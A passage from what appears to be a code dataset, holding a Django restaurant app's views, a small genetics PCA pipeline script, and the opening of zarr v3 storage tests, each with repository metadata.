#expiration_time=selected_time + timedelta(hours=1) \n )\n booking.save()\n else:\n return HttpResponse(\"{'error':1}\", content_type='application/json')\n\n date = request.GET.get('date', datetime.today().date())\n\n # Check if the user is a manager\n if request.user.is_staff:\n # If the user is a manager, return all bookings\n bookings = Booking.objects.all().filter(reservation_date=date)\n else:\n # If the user is not a manager, return only the user's bookings\n bookings = Booking.objects.filter(reservation_date=date, user=request.user)\n\n # Serialize the Booking objects\n booking_json = serializers.serialize('json', bookings)\n\n # Modify the serialized data to include the menu name and user name\n booking_data = json.loads(booking_json)\n for entry in booking_data:\n fields = entry['fields']\n\n # Replace menu ID with menu name\n menu_id = fields['menu']\n if menu_id:\n menu_name = Menu.objects.get(id=menu_id).name\n fields['menu'] = menu_name\n\n # Replace user ID with username\n user_id = fields['user']\n if user_id:\n user_name = User.objects.get(id=user_id).username\n fields['user'] = user_name\n\n # Convert back to JSON and return the response\n return HttpResponse(json.dumps(booking_data), content_type='application/json')\n\ndef booking(request):\n date = request.GET.get('date', datetime.today().date())\n user = request.user if request.user.is_authenticated else None\n\n # Make a request to the 'bookings' view to get the booking data\n response = bookings(request)\n \n if response.status_code == 200:\n # Parse the JSON content\n try:\n booking_data = json.loads(response.content)\n except json.JSONDecodeError:\n return JsonResponse({'error': 'Unable to parse booking data'})\n \n\n # Process the JSON data as needed for rendering\n processed_data = [\n {\n 'first_name': item['fields']['first_name'],\n 'reservation_date': item['fields']['reservation_date'],\n 'reservation_slot': item['fields']['reservation_slot'],\n }\n for item in booking_data\n ]\n \n return render(request, 'bookings.html', {'booking_data': processed_data})\n else:\n # Handle the case where the 'bookings' view returns an error\n return JsonResponse({'error': 'Unable to fetch booking data'})\n\n\n\n\n\ndef menu_data(request):\n categories = Category.objects.values_list('title', flat=True).distinct()\n menus = Menu.objects.all()\n\n category_menu_data = {\n 'categories': list(categories),\n 'menus': [{'id': menu.id, 'name': menu.name, 'category': menu.category.title} for menu in menus],\n }\n\n # Use DjangoJSONEncoder to handle serialization of additional types\n return JsonResponse(category_menu_data, encoder=DjangoJSONEncoder)\n\n\n\n\n\n\nclass MenuItemsView(generics.ListCreateAPIView):\n queryset = Menu.objects.all()\n serializer_class = MenuItemSerializer\n ordering_fields = ['price', 'inventory']\n filterset_fields = ['price', 'inventory']\n search_fields = ['name']\n pagination_class = YourPaginationClass\n permission_classes = [IsManagerOrReadOnly]\n\n def get(self, request, *args, **kwargs):\n menu_items = self.get_queryset()\n print(\"Primary keys of menu items:\", [item.pk for item in menu_items])\n\n serializer = self.get_serializer(menu_items, many=True)\n \n return render(request, 'menu.html', {'menu_items': serializer.data})\n\n\nclass SingleMenuItemView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Menu.objects.all()\n serializer_class = MenuItemSerializer\n permission_classes = [IsManagerOrReadOnly] \n\n def get(self, request, *args, **kwargs):\n menu_item = self.get_object()\n serializer = self.get_serializer(menu_item)\n return render(request, 'menu_item.html', {'menu_item': serializer.data})\n\n \nclass CategoriesView(generics.ListCreateAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n\nclass RatingsView(generics.ListCreateAPIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n\n queryset = Rating.objects.all()\n serializer_class = RatingSerializer\n\n def get_permissions(self):\n if(self.request.method=='GET'):\n return []\n\n return [IsAuthenticated()]\n \n\n\n\nclass CartAddItemView(generics.CreateAPIView):\n serializer_class = CartSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def create(self, request, *args, **kwargs):\n menu_item_id = request.data.get('menu')\n quantity = request.data.get('quantity', 1)\n\n if not menu_item_id:\n return Response({'error': 'Menu item ID is required.'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n menu_item = Menu.objects.get(id=menu_item_id)\n except Menu.DoesNotExist:\n return Response({'error': 'Menu item not found.'}, status=status.HTTP_404_NOT_FOUND)\n\n # Validate quantity\n if not isinstance(quantity, int) or quantity <= 0:\n return Response({'error': 'Invalid quantity.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Use the helper function to get or create a cart entry\n cart_entry, new_entry_created = get_or_create_cart_entry(request.user, menu_item)\n\n # Adjust the response based on whether a new entry was created\n status_code = status.HTTP_201_CREATED if new_entry_created else status.HTTP_200_OK\n\n serializer = CartSerializer(cart_entry)\n return Response(serializer.data, status=status_code)\n\n\n\n\n\n\n\n\n\nclass CartMenuItemsView(APIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n permission_classes = [IsAuthenticated]\n serializer_class = CartSerializer\n\n def get(self, request, *args, **kwargs):\n cart_items = Cart.objects.filter(user=request.user).order_by('-created_at')\n cart_total = sum(item.price for item in cart_items)\n\n context = {'cart_items': cart_items, 'cart_total': cart_total}\n return render(request, 'cart.html', context)\n\n def perform_create(self, serializer):\n menu_item = serializer.validated_data['menu']\n cart_entry, new_entry_created = get_or_create_cart_entry(self.request.user, menu_item)\n status_code = status.HTTP_201_CREATED if new_entry_created else status.HTTP_200_OK\n serializer = CartSerializer(cart_entry)\n return Response(serializer.data, status=status_code)\n\n def delete(self, request, *args, **kwargs):\n # Delete all menu items created by the current user\n Cart.objects.filter(user=request.user).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n \n\nclass CartItemDetailView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Cart.objects.all()\n serializer_class = CartSerializer\n permission_classes = [IsAuthenticated]\n\n def get_object(self):\n cart_item_id = self.kwargs['pk']\n user = self.request.user\n\n try:\n cart_item = Cart.objects.get(pk=cart_item_id, user=user)\n return cart_item\n except Cart.DoesNotExist:\n raise Http404(\"Cart item does not exist or does not belong to the user.\")\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n quantity_change = request.data.get('quantity_change', 0)\n\n if not isinstance(quantity_change, int):\n return Response({'error': 'Invalid quantity change.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Update the quantity\n instance.quantity += quantity_change\n\n # Check if the updated quantity is zero, and delete the item from the cart\n if instance.quantity <= 0:\n instance.delete()\n return Response({'message': 'Item deleted from the cart.'}, status=status.HTTP_204_NO_CONTENT)\n else:\n instance.save()\n serializer = self.get_serializer(instance)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n\n\n\nclass OrderListView(generics.ListCreateAPIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n serializer_class = OrderSerializer\n permission_classes = [IsAuthenticated]\n\n def get_user_orders(self):\n user = self.request.user\n if user.groups.filter(name='manager').exists():\n # If the user is a manager, return all orders\n return Order.objects.all().order_by('-time')\n else:\n # If the user is not a manager, return orders for that user\n return get_user_orders(self.request).order_by('-time')\n\n def get_queryset(self):\n return self.get_user_orders()\n\n def perform_create(self, serializer):\n # Retrieve current cart items for the current user\n cart_items = Cart.objects.filter(user=self.request.user)\n\n # Check if the cart is not empty\n if not cart_items.exists():\n raise PermissionDenied({'error': 'Cart is empty'})\n\n # Calculate total price based on cart items\n total_price = sum(cart_item.price for cart_item in cart_items)\n\n delivery_option = self.request.data.get('delivery_option', 'SelfPickUp')\n\n # Set delivery_status based on delivery_option\n delivery_status = 'Pending' if delivery_option == 'Delivery' else None\n\n # Create a new order\n order = Order.objects.create(\n user=self.request.user,\n total=total_price,\n time=datetime.now(),\n delivery_status=delivery_status,\n delivery_option=delivery_option,\n )\n\n # Create order items based on cart items\n for cart_item in cart_items:\n OrderItem.objects.create(\n order=order,\n menu=cart_item.menu,\n quantity=cart_item.quantity,\n unit_price=cart_item.unit_price,\n price=cart_item.price,\n )\n\n # Delete all items from the cart for this user\n cart_items.delete()\n\n # Set the created order as the serializer instance\n serializer.instance = order\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def get(self, request, *args, **kwargs):\n orders = self.get_queryset()\n return render(request, 'order.html', {'orders': orders})\n\n\nclass OrderDetailView(generics.RetrieveUpdateDestroyAPIView):\n throttle_classes = [AnonRateThrottle, UserRateThrottle]\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n permission_classes = [IsOrderOwner | IsManagerOrReadOnly | IsDeliveryCrew | IsManager | IsAuthenticated]\n\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n\n # Check if a manager or delivery crew is updating the order\n if request.user.groups.filter(name='manager').exists():\n # Only managers can assign a delivery crew\n self.check_manager_permissions(serializer.validated_data)\n elif request.user.groups.filter(name='delivery_crew').exists():\n # Delivery crew can update the delivery_status field\n self.check_delivery_crew_permissions(serializer.validated_data)\n else:\n # Users/customers can only update the order without assigning a delivery crew\n serializer.validated_data.pop('delivery_status', None)\n\n # Allow updating other fields (like status) for all user groups\n self.perform_update(serializer)\n return Response(serializer.data)\n\n def perform_destroy(self, instance):\n # Check if the user has permission to delete the order\n self.check_manager_permissions()\n # Perform additional actions before deleting the order\n instance.delete()\n\n def delete(self, request, *args, **kwargs):\n instance = self.get_object()\n # Check if the user has permission to delete the order\n self.check_manager_permissions()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def get_user_orders(self):\n return get_user_orders(self.request).order_by('-time')\n\n def get_queryset(self):\n return self.get_user_orders()\n\n def get_permissions(self):\n return super().get_permissions()\n\n def check_manager_permissions(self, validated_data=None):\n if validated_data and 'delivery_status' in validated_data and validated_data['delivery_status'] is not None:\n raise PermissionDenied(\"Managers can only update the status or assign a delivery crew.\")\n\n def check_delivery_crew_permissions(self, validated_data=None):\n if validated_data and 'delivery_status' in validated_data:\n # Additional logic for handling status updates by delivery crew\n # You may want to add more conditions or validation here\n pass\n else:\n # Delivery crew cannot update the delivery_status field\n validated_data.pop('delivery_status', None)\n\n\n@api_view(['GET'])\n@permission_classes([IsManager])\ndef delivery_crew_list(request):\n # Retrieve all users who belong to the 'delivery_crew' group\n delivery_crew_users = User.objects.filter(groups__name='delivery_crew')\n\n # Extract data from User and Deliverystatus models\n crew_data = [\n {\n 'id': user.delivery_crew.id if hasattr(user, 'delivery_crew') else None,\n 'name': user.delivery_crew.name if hasattr(user, 'delivery_crew') else None,\n 'is_available': user.delivery_crew.is_available if hasattr(user, 'delivery_crew') else None\n }\n for user in delivery_crew_users\n ]\n\n return Response(crew_data)\n\n\n@api_view(['PUT'])\n@permission_classes([IsManager])\ndef assign_delivery_crew(request, order_id):\n # Extract delivery crew ID from the request data\n delivery_crew_id = request.data.get('delivery_crew_id')\n\n # Retrieve the order and delivery crew objects\n order = get_object_or_404(Order, pk=order_id)\n delivery_crew = get_object_or_404(Deliverystatus, pk=delivery_crew_id)\n\n # Ensure the order is pending before assigning a delivery crew\n if order.order_status == 'Pending Assignment':\n # Check if the delivery crew is available\n if delivery_crew.is_available:\n # Update the associated user's delivery_crew field\n user = User.objects.filter(deliverystatus=delivery_crew).first()\n if user:\n user.deliverystatus = None\n user.save()\n\n # Assign the delivery crew to the order\n order.deliverystatus = delivery_crew\n order.order_status = 'Assigned' # Update the order status\n order.save()\n\n return Response({'success': 'Delivery crew assigned successfully'}, status=status.HTTP_200_OK)\n else:\n return Response({'error': 'Selected delivery crew is not available'}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'error': 'Order must be pending to assign a delivery crew'}, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['PUT'])\n@permission_classes([IsManager])\ndef mark_delivered(request, order_id):\n order = get_object_or_404(Order, pk=order_id)\n\n # Ensure the order is assigned before marking as delivered\n if order.order_status == 'Assigned':\n # Update the associated user's delivery_crew field\n user = User.objects.filter(delivery_crew=order.delivery_crew).first()\n if user:\n user.delivery_crew = None\n user.save()\n\n order.order_status = 'Delivered'\n order.save()\n return Response({'success': 'Order marked as delivered successfully'}, status=status.HTTP_200_OK)\n else:\n return Response({'error': 'Order must be assigned to mark as delivered'}, status=status.HTTP_400_BAD_REQUEST)\n\n#@method_decorator(login_required, name='dispatch')\n#class AssignDeliveryCrewView(View):\n template_name = 'assign_delivery_crew.html'\n\n def get(self, request, order_id):\n # You can perform any necessary checks here before rendering the template\n # For example, check if the user is a manager\n\n # Pass the order_id to the template\n context = {'order_id': order_id}\n return render(request, self.template_name, context)\n \n\n\n\ndef checkout(request):\n # Retrieve cart items for the current user\n cart_items = Cart.objects.filter(user=request.user)\n\n # Calculate total price\n total_price = sum(item.menu.price * item.quantity for item in cart_items)\n\n if request.method == 'POST':\n if not request.user.is_authenticated:\n return redirect('login')\n \n order_time = timezone.now()\n\n # Create an order locally in the Django database\n order = Order.objects.create(user=request.user, total=total_price,time=order_time) #status='True')\n\n # Move cart items to the order\n for cart_item in cart_items:\n OrderItem.objects.create(\n order=order,\n menu=cart_item.menu,\n quantity=cart_item.quantity,\n unit_price=cart_item.menu.price,\n price=cart_item.menu.price * cart_item.quantity\n )\n\n # Clear the user's cart\n cart_items.delete()\n\n \n \n return HttpResponse('Order successful!')\n\n return render(request, 'checkout.html', {'cart_items': cart_items, 'total_price': total_price})\n\n\n@api_view(['GET', 'POST'])\n@permission_classes([IsManagerOrReadOnly])\ndef manager_users(request):\n if request.method == 'GET':\n # Retrieve all users in the 'manager' group\n managers = User.objects.filter(groups__name='manager')\n manager_data = [{'id': manager.id, 'username': manager.username} for manager in managers]\n return Response(manager_data)\n\n elif request.method == 'POST':\n # Assign the user in the payload to the 'manager' group\n try:\n user_id = request.data['user_id']\n user = User.objects.get(pk=user_id)\n except (KeyError, User.DoesNotExist):\n return Response({'error': 'Invalid user_id'}, status=status.HTTP_400_BAD_REQUEST)\n\n manager_group, created = Group.objects.get_or_create(name='manager')\n user.groups.add(manager_group)\n return Response(status=status.HTTP_201_CREATED)\n\n\n@api_view(['DELETE'])\n@permission_classes([IsManagerOrReadOnly])\ndef remove_manager_user(request, user_id):\n user = get_object_or_404(User, pk=user_id)\n manager_group = Group.objects.get(name='manager')\n user.groups.remove(manager_group)\n return Response({'success': 'User removed from manager group successfully'}, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST'])\n@permission_classes([IsManagerOrReadOnly])\ndef delivery_crew_users(request):\n if request.method == 'GET':\n # Retrieve all users in the 'delivery_crew' group\n delivery_crew = User.objects.filter(groups__name='delivery_crew')\n delivery_crew_data = [{'id': user.id, 'username': user.username} for user in delivery_crew]\n return Response(delivery_crew_data)\n\n elif request.method == 'POST':\n # Assign the user in the payload to the 'delivery_crew' group\n try:\n user_id = request.data['user_id']\n user = User.objects.get(pk=user_id)\n except (KeyError, User.DoesNotExist):\n return Response({'error': 'Invalid user_id'}, status=status.HTTP_400_BAD_REQUEST)\n\n delivery_crew_group, created = Group.objects.get_or_create(name='delivery_crew')\n user.groups.add(delivery_crew_group)\n return Response({'success': 'User added to delivery_crew group successfully'}, status=status.HTTP_201_CREATED)\n\n@api_view(['DELETE'])\n@permission_classes([IsManagerOrReadOnly])\ndef remove_delivery_crew_user(request, user_id):\n user = get_object_or_404(User, pk=user_id)\n delivery_crew_group = Group.objects.get(name='delivery_crew')\n user.groups.remove(delivery_crew_group)\n return Response({'success': 'User removed from delivery_crew group successfully'}, status=status.HTTP_200_OK)\n","repo_name":"Decodeine/restaurant","sub_path":"restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":26855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"23775365357","text":"import sys,os\ndef write_par(prefix):\n parf='{}.par'.format(prefix)\n with open(parf, 'w') as out:\n out.write('genotypename: {}.geno\\n'.format(prefix))\n out.write('snpname: {}.snp\\n'.format(prefix))\n out.write('indivname: {}.ind\\n'.format(prefix))\n out.write('evecoutname: {}.evec\\n'.format(prefix))\n out.write('evaloutname: {}.eval\\n'.format(prefix))\n out.write('altnormstyle: NO\\n')\n out.write('numoutlieriter: 0\\n')\n print('write PCA parameter file into {}'.format(parf))\n\ndef write_plot(prefix):\n rscf='{}.r'.format(prefix)\n with open(rscf, 'w') as out:\n out.write('library(ggplot2)\\n')\n out.write('eval<-read.table(\"{}.eval\")\\n'.format(prefix))\n out.write('xl<-paste(\"PC1(\",round(eval$V1[1],digits=2),\"%)\",sep=\"\")\\n')\n out.write('yl<-paste(\"PC2(\",round(eval$V1[2],digits=2),\"%)\",sep=\"\")\\n')\n out.write('evec<-read.table(\"{}.evec\",skip=1)\\n'.format(prefix))\n out.write('pdf(\"{}_pca.pdf\")\\n'.format(prefix))\n out.write('p<-ggplot(data=evec,aes(x=V2,y=V3,color=V12))+xlab(xl)+ylab(yl)\\n')\n out.write('p+geom_point(lwd=4)\\n')\n out.write('dev.off()\\n')\n print('write plot PCA script to {}.r\\n'.format(prefix))\n \ndef pca(prefix):\n write_par(prefix)\n os.system('smartpca -p {}.par > {}_pca.log'.format(prefix,prefix))\n write_plot(prefix)\n os.system('Rscript {}.r'.format(prefix))\n print('Finished the PCA pipeline, please check results in {}_pca.pdf'.format(prefix))\n\nif __name__=='__main__':\n if len(sys.argv)>1:\n pca(sys.argv[1])\n else:\n print('Usage: python {} prefix'.format(sys.argv[0]))\n","repo_name":"Shuhua-Group/AdmixSim","sub_path":"pcapipe.py","file_name":"pcapipe.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"833412609","text":"import array\nimport atexit\nimport copy\nimport inspect\nimport os\nimport tempfile\n\nimport numpy as np\nimport pytest\n\nimport zarr\nfrom zarr._storage.store import _get_hierarchy_metadata, v3_api_available, StorageTransformer\nfrom zarr._storage.v3_storage_transformers import ShardingStorageTransformer, v3_sharding_available\nfrom zarr.core import Array\nfrom zarr.meta import _default_entry_point_metadata_v3\nfrom zarr.storage import (\n atexit_rmglob,\n atexit_rmtree,\n data_root,\n default_compressor,\n getsize,\n init_array,\n meta_root,\n normalize_store_arg,\n)\nfrom zarr._storage.v3 import (\n ABSStoreV3,\n ConsolidatedMetadataStoreV3,\n DBMStoreV3,\n DirectoryStoreV3,\n FSStoreV3,\n KVStore,\n KVStoreV3,\n LMDBStoreV3,\n LRUStoreCacheV3,\n MemoryStoreV3,\n MongoDBStoreV3,\n RedisStoreV3,\n SQLiteStoreV3,\n StoreV3,\n ZipStoreV3,\n)\nfrom zarr.tests.util import CountingDictV3, have_fsspec, skip_test_env_var, mktemp\n\n# pytest will fail to run if the following fixtures aren't imported here\nfrom .test_storage import StoreTests as _StoreTests\nfrom .test_storage import TestABSStore as _TestABSStore\nfrom .test_storage import TestConsolidatedMetadataStore as _TestConsolidatedMetadataStore\nfrom .test_storage import TestDBMStore as _TestDBMStore\nfrom .test_storage import TestDBMStoreBerkeleyDB as _TestDBMStoreBerkeleyDB\nfrom .test_storage import TestDBMStoreDumb as _TestDBMStoreDumb\nfrom .test_storage import TestDBMStoreGnu as _TestDBMStoreGnu\nfrom .test_storage import TestDBMStoreNDBM as _TestDBMStoreNDBM\nfrom .test_storage import TestDirectoryStore as _TestDirectoryStore\nfrom .test_storage import TestFSStore as _TestFSStore\nfrom .test_storage import TestLMDBStore as _TestLMDBStore\nfrom .test_storage import TestLRUStoreCache as _TestLRUStoreCache\nfrom .test_storage import TestMemoryStore as _TestMemoryStore\nfrom .test_storage import TestSQLiteStore as _TestSQLiteStore\nfrom .test_storage import TestSQLiteStoreInMemory as _TestSQLiteStoreInMemory\nfrom .test_storage import TestZipStore as _TestZipStore\nfrom .test_storage import dimension_separator_fixture, s3, skip_if_nested_chunks # noqa\n\n\npytestmark = pytest.mark.skipif(not v3_api_available, reason=\"v3 api is not available\")\n\n\n@pytest.fixture(\n params=[\n (None, \"/\"),\n (\".\", \".\"),\n (\"/\", \"/\"),\n ]\n)\ndef dimension_separator_fixture_v3(request):\n return request.param\n\n\nclass DummyStore:\n # contains all methods expected of Mutable Mapping\n\n def keys(self):\n \"\"\"keys\"\"\"\n\n def values(self):\n \"\"\"values\"\"\"\n\n def get(self, value, default=None):\n \"\"\"get\"\"\"\n\n def __setitem__(self, key, value):\n \"\"\"__setitem__\"\"\"\n\n def __getitem__(self, key):\n \"\"\"__getitem__\"\"\"\n\n def __delitem__(self, key):\n \"\"\"__delitem__\"\"\"\n\n def __contains__(self, key):\n \"\"\"__contains__\"\"\"\n\n\nclass InvalidDummyStore:\n # does not contain expected methods of a MutableMapping\n\n def keys(self):\n \"\"\"keys\"\"\"\n\n\nclass DummyStorageTransfomer(StorageTransformer):\n TEST_CONSTANT = \"test1234\"\n\n extension_uri = \"https://purl.org/zarr/spec/storage_transformers/dummy/1.0\"\n valid_types = [\"dummy_type\"]\n\n def __init__(self, _type, test_value) -> None:\n super().__init__(_type)\n assert test_value == self.TEST_CONSTANT\n self.test_value = test_value\n\n\ndef test_ensure_store_v3():\n class InvalidStore:\n pass\n\n with pytest.raises(ValueError):\n StoreV3._ensure_store(InvalidStore())\n\n # cannot initialize with a store from a different Zarr version\n with pytest.raises(ValueError):\n StoreV3._ensure_store(KVStore(dict()))\n\n assert StoreV3._ensure_store(None) is None\n\n # class with all methods of a MutableMapping will become a KVStoreV3\n assert isinstance(StoreV3._ensure_store(DummyStore), KVStoreV3)\n\n with pytest.raises(ValueError):\n # does not have the methods expected of a MutableMapping\n StoreV3._ensure_store(InvalidDummyStore)\n\n\ndef test_valid_key():\n store = KVStoreV3(dict)\n\n # only ascii keys are valid\n assert not store._valid_key(5)\n assert not store._valid_key(2.8)\n\n for key in store._valid_key_characters:\n assert store._valid_key(key)\n\n # other characters not in store._valid_key_characters are not allowed\n assert not store._valid_key(\"*\")\n assert not store._valid_key(\"~\")\n assert not store._valid_key(\"^\")\n\n\ndef test_validate_key():\n store = KVStoreV3(dict)\n\n # zarr.json is a valid key\n store._validate_key(\"zarr.json\")\n # but other keys not starting with meta/ or data/ are not\n with pytest.raises(ValueError):\n store._validate_key(\"zar.json\")\n\n # valid ascii keys\n for valid in [\n meta_root + \"arr1.array.json\",\n data_root + \"arr1.array.json\",\n meta_root + \"subfolder/item_1-0.group.json\",\n ]:\n store._validate_key(valid)\n # but otherwise valid keys cannot end in /\n with pytest.raises(ValueError):\n assert store._validate_key(valid + \"/\")\n\n for invalid in [0, \"*\", \"~\", \"^\", \"&\"]:\n with pytest.raises(ValueError):\n store._validate_key(invalid)\n\n\nclass StoreV3Tests(_StoreTests):\n\n version = 3\n root = meta_root\n\n def test_getsize(self):\n # TODO: determine proper getsize() behavior for v3\n # Currently returns the combined size of entries under\n # meta/root/path and data/root/path.\n # Any path not under meta/root/ or data/root/ (including zarr.json)\n # returns size 0.\n\n store = self.create_store()\n if isinstance(store, dict) or hasattr(store, \"getsize\"):\n assert 0 == getsize(store, \"zarr.json\")\n store[meta_root + \"foo/a\"] = b\"x\"\n assert 1 == getsize(store)\n assert 1 == getsize(store, \"foo\")\n store[meta_root + \"foo/b\"] = b\"x\"\n assert 2 == getsize(store, \"foo\")\n assert 1 == getsize(store, \"foo/b\")\n store[meta_root + \"bar/a\"] = b\"yy\"\n assert 2 == getsize(store, \"bar\")\n store[data_root + \"bar/a\"] = b\"zzz\"\n assert 5 == getsize(store, \"bar\")\n store[data_root + \"baz/a\"] = b\"zzz\"\n assert 3 == getsize(store, \"baz\")\n assert 10 == getsize(store)\n store[data_root + \"quux\"] = array.array(\"B\", b\"zzzz\")\n assert 14 == getsize(store)\n assert 4 == getsize(store, \"quux\")\n store[data_root + \"spong\"] = np.frombuffer(b\"zzzzz\", dtype=\"u1\")\n assert 19 == getsize(store)\n assert 5 == getsize(store, \"spong\")\n store.close()\n\n def test_init_array(self, dimension_separator_fixture_v3):\n\n pass_dim_sep, want_dim_sep = dimension_separator_fixture_v3\n\n store = self.create_store()\n path = \"arr1\"\n transformer = DummyStorageTransfomer(\n \"dummy_type\", test_value=DummyStorageTransfomer.TEST_CONSTANT\n )\n init_array(\n store,\n path=path,\n shape=1000,\n chunks=100,\n dimension_separator=pass_dim_sep,\n storage_transformers=[transformer],\n )\n\n # check metadata\n mkey = meta_root + path + \".array.json\"\n assert mkey in store\n meta = store._metadata_class.decode_array_metadata(store[mkey])\n assert (1000,) == meta[\"shape\"]\n assert (100,) == meta[\"chunk_grid\"][\"chunk_shape\"]\n assert np.dtype(None) == meta[\"data_type\"]\n assert default_compressor == meta[\"compressor\"]\n assert meta[\"fill_value\"] is None\n # Missing MUST be assumed to be \"/\"\n assert meta[\"chunk_grid\"][\"separator\"] is want_dim_sep\n assert len(meta[\"storage_transformers\"]) == 1\n assert isinstance(meta[\"storage_transformers\"][0], DummyStorageTransfomer)\n assert meta[\"storage_transformers\"][0].test_value == DummyStorageTransfomer.TEST_CONSTANT\n store.close()\n\n def test_list_prefix(self):\n\n store = self.create_store()\n path = \"arr1\"\n init_array(store, path=path, shape=1000, chunks=100)\n\n expected = [meta_root + \"arr1.array.json\", \"zarr.json\"]\n assert sorted(store.list_prefix(\"\")) == expected\n\n expected = [meta_root + \"arr1.array.json\"]\n assert sorted(store.list_prefix(meta_root.rstrip(\"/\"))) == expected\n\n # cannot start prefix with '/'\n with pytest.raises(ValueError):\n store.list_prefix(prefix=\"/\" + meta_root.rstrip(\"/\"))\n\n def test_equal(self):\n store = self.create_store()\n assert store == store\n\n def test_rename_nonexisting(self):\n store = self.create_store()\n if store.is_erasable():\n with pytest.raises(ValueError):\n store.rename(\"a\", \"b\")\n else:\n with pytest.raises(NotImplementedError):\n store.rename(\"a\", \"b\")\n\n def test_get_partial_values(self):\n store = self.create_store()\n store.supports_efficient_get_partial_values in [True, False]\n store[data_root + \"foo\"] = b\"abcdefg\"\n store[data_root + \"baz\"] = b\"z\"\n assert [b\"a\"] == store.get_partial_values([(data_root + \"foo\", (0, 1))])\n assert [\n b\"d\",\n b\"b\",\n b\"z\",\n b\"abc\",\n b\"defg\",\n b\"defg\",\n b\"g\",\n b\"ef\",\n ] == store.get_partial_values(\n [\n (data_root + \"foo\", (3, 1)),\n (data_root + \"foo\", (1, 1)),\n (data_root + \"baz\", (0, 1)),\n (data_root + \"foo\", (0, 3)),\n (data_root + \"foo\", (3, 4)),\n (data_root + \"foo\", (3, None)),\n (data_root + \"foo\", (-1, None)),\n (data_root + \"foo\", (-3, 2)),\n ]\n )\n\n def test_set_partial_values(self):\n store = self.create_store()\n store.supports_efficient_set_partial_values()\n store[data_root + \"foo\"] = b\"abcdefg\"\n store.set_partial_values([(data_root + \"foo\", 0, b\"hey\")])\n assert store[data_root + \"foo\"] == b\"heydefg\"\n\n store.set_partial_values([(data_root + \"baz\", 0, b\"z\")])\n assert store[data_root + \"baz\"] == b\"z\"\n store.set_partial_values(\n [\n (data_root + \"foo\", 1, b\"oo\"),\n (data_root + \"baz\", 1, b\"zzz\"),\n (data_root + \"baz\", 4, b\"aaaa\"),\n (data_root + \"foo\", 6, b\"done\"),\n ]\n )\n assert store[data_root + \"foo\"] == b\"hoodefdone\"\n assert store[data_root + \"baz\"] == b\"zzzzaaaa\"\n store.set_partial_values(\n [\n (data_root + \"foo\", -2, b\"NE\"),\n (data_root + \"baz\", -5, b\"q\"),\n ]\n )\n assert store[data_root + \"foo\"] == b\"hoodefdoNE\"\n assert store[data_root + \"baz\"] == b\"zzzq\"\n\n\nclass TestMappingStoreV3(StoreV3Tests):\n def create_store(self, **kwargs):\n return KVStoreV3(dict())\n\n def test_set_invalid_content(self):\n # Generic mappings support non-buffer types\n pass\n\n\nclass TestMemoryStoreV3(_TestMemoryStore, StoreV3Tests):\n def create_store(self, **kwargs):\n skip_if_nested_chunks(**kwargs)\n return MemoryStoreV3(**kwargs)\n\n\nclass TestDirectoryStoreV3(_TestDirectoryStore, StoreV3Tests):\n def create_store(self, normalize_keys=False, **kwargs):\n # For v3, don't have to skip if nested.\n # skip_if_nested_chunks(**kwargs)\n\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n store = DirectoryStoreV3(path, normalize_keys=normalize_keys, **kwargs)\n return store\n\n def test_rename_nonexisting(self):\n store = self.create_store()\n with pytest.raises(FileNotFoundError):\n store.rename(meta_root + \"a\", meta_root + \"b\")\n\n\n@pytest.mark.skipif(have_fsspec is False, reason=\"needs fsspec\")\nclass TestFSStoreV3(_TestFSStore, StoreV3Tests):\n def create_store(self, normalize_keys=False, dimension_separator=\".\", path=None, **kwargs):\n\n if path is None:\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n\n store = FSStoreV3(\n path, normalize_keys=normalize_keys, dimension_separator=dimension_separator, **kwargs\n )\n return store\n\n def test_init_array(self):\n store = self.create_store()\n path = \"arr1\"\n init_array(store, path=path, shape=1000, chunks=100)\n\n # check metadata\n mkey = meta_root + path + \".array.json\"\n assert mkey in store\n meta = store._metadata_class.decode_array_metadata(store[mkey])\n assert (1000,) == meta[\"shape\"]\n assert (100,) == meta[\"chunk_grid\"][\"chunk_shape\"]\n assert np.dtype(None) == meta[\"data_type\"]\n assert meta[\"chunk_grid\"][\"separator\"] == \"/\"\n\n\n@pytest.mark.skipif(have_fsspec is False, reason=\"needs fsspec\")\nclass TestFSStoreV3WithKeySeparator(StoreV3Tests):\n def create_store(self, normalize_keys=False, key_separator=\".\", **kwargs):\n\n # Since the user is passing key_separator, that will take priority.\n skip_if_nested_chunks(**kwargs)\n\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n return FSStoreV3(path, normalize_keys=normalize_keys, key_separator=key_separator)\n\n\n# TODO: enable once N5StoreV3 has been implemented\n# @pytest.mark.skipif(True, reason=\"N5StoreV3 not yet fully implemented\")\n# class TestN5StoreV3(_TestN5Store, TestDirectoryStoreV3, 